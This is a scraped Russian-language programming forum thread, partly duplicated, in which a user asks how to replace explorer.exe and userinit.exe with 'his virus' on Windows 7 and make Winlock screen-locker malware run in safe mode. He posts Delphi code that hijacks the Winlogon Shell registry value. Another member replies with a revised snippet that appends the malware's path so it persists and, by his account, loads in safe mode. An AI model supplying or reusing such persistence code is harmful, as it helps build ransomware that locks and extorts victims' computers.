Замена файлов на delphi

alersrals · 07.03.2012, 17:51

Добрый вечер дорогие форумчане. У меня к вам вопрос, как заменить программно файлы: explorer.exe, userinit.exe в Win 7 своим вирусом.
Права админа есть. Пробовал функцию DeleteFile, не срабатывает, в Google искал, про системные файлы нет ничего, может кто знает как в Win 7 x64 заменить данные файлы. И ещё как в реестре поменять путь к explorer.exe и userinit.exe .
Вот код:

Код:

   Reg:=TRegistry.Create;
   Reg.RootKey:=HKEY_LOCAL_MACHINE;
   Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
   Reg.WriteString('SHELL','C:\system.exe,' );
   Reg.CloseKey;
   Reg.Free;

Он помогает, но не грузится в безопасном режиме, почему ?
Ведь explorer.exe подменяется и там, и ещё у меня визуально в Regedit не отображается изменённая ветка, то есть:
...\Shell=explorer.exe, хотя когда запускаю AntiwinlockerCD, там пишет оболочка заражена.
Короче:
1.Как подменить данные файлы своим вирусов в Win 7 X64 и прописаться в реестре (права администратора, обход UAC не требуется)
2.Как грузить Winlock в безопасном режиме( так и не разобрался).
Прошу по возможности помочь.
Заранее спасибо

mironich · 07.03.2012, 19:38

Цитата:

Он помогает, но не грузится в безопасном режиме, почему ?

В безопасном ряжиме все подряд не грузиться на то он и безопасный.

Вадимка · 08.03.2012, 11:54

из за этого кода даже самые простые антивирусы будут кричать , ищи другой способ...
ну а если вдруг решишь продолжить своё творение по старому образу, то возможно тебе поможет соседняя тема про winlock
так и в безопасном грузит

Код:

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0)));
Reg.CloseKey;
Reg.Free;

alersrals · 08.03.2012, 12:16

Цитата:

Сообщение от Вадимка

из за этого кода даже самые простые антивирусы будут кричать , ищи другой способ...
ну а если вдруг решишь продолжить своё творение по старому образу, то возможно тебе поможет соседняя тема про winlock
так и в безопасном грузит

Код:

Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true);
Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0)));
Reg.CloseKey;
Reg.Free;

Спс большое, очень благодарен

07.03.2012, 17:51	#1
alersrals RAM 2MB Регистрация: 07.03.2012 Сообщений: 2	Замена файлов на delphi Добрый вечер дорогие форумчане. У меня к вам вопрос, как заменить программно файлы: explorer.exe, userinit.exe в Win 7 своим вирусом. Права админа есть. Пробовал функцию DeleteFile, не срабатывает, в Google искал, про системные файлы нет ничего, может кто знает как в Win 7 x64 заменить данные файлы. И ещё как в реестре поменять путь к explorer.exe и userinit.exe . Вот код: Код: Reg:=TRegistry.Create; Reg.RootKey:=HKEY_LOCAL_MACHINE; Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true); Reg.WriteString('SHELL','C:\system.exe,' ); Reg.CloseKey; Reg.Free; Он помогает, но не грузится в безопасном режиме, почему ? Ведь explorer.exe подменяется и там, и ещё у меня визуально в Regedit не отображается изменённая ветка, то есть: ...\Shell=explorer.exe, хотя когда запускаю AntiwinlockerCD, там пишет оболочка заражена. Короче: 1.Как подменить данные файлы своим вирусов в Win 7 X64 и прописаться в реестре (права администратора, обход UAC не требуется) 2.Как грузить Winlock в безопасном режиме( так и не разобрался). Прошу по возможности помочь. Заранее спасибо

Последний раз редактировалось mironich; 07.03.2012 в 19:37.

08.03.2012, 11:54	#3
Вадимка RAM 64MB Регистрация: 09.02.2010 Сообщений: 94	Ответ: Замена файлов на delphi из за этого кода даже самые простые антивирусы будут кричать , ищи другой способ... ну а если вдруг решишь продолжить своё творение по старому образу, то возможно тебе поможет соседняя тема про winlock так и в безопасном грузит Код: Reg:=TRegistry.Create; Reg.RootKey:=HKEY_LOCAL_MACHINE; Reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',true); Reg.WriteString('SHELL','Explorer.exe,' + 'C:\Windows\' + ExtractFileName(ParamStr(0))); Reg.CloseKey; Reg.Free;

Последний раз редактировалось Вадимка; 08.03.2012 в 12:01.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск